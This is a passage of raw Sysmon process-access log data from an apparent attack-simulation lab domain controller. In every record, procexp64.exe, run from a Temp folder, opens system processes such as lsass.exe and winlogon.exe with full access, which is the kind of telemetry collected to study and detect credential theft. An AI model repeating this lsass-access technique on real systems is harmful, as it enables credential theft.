Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:24.002{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 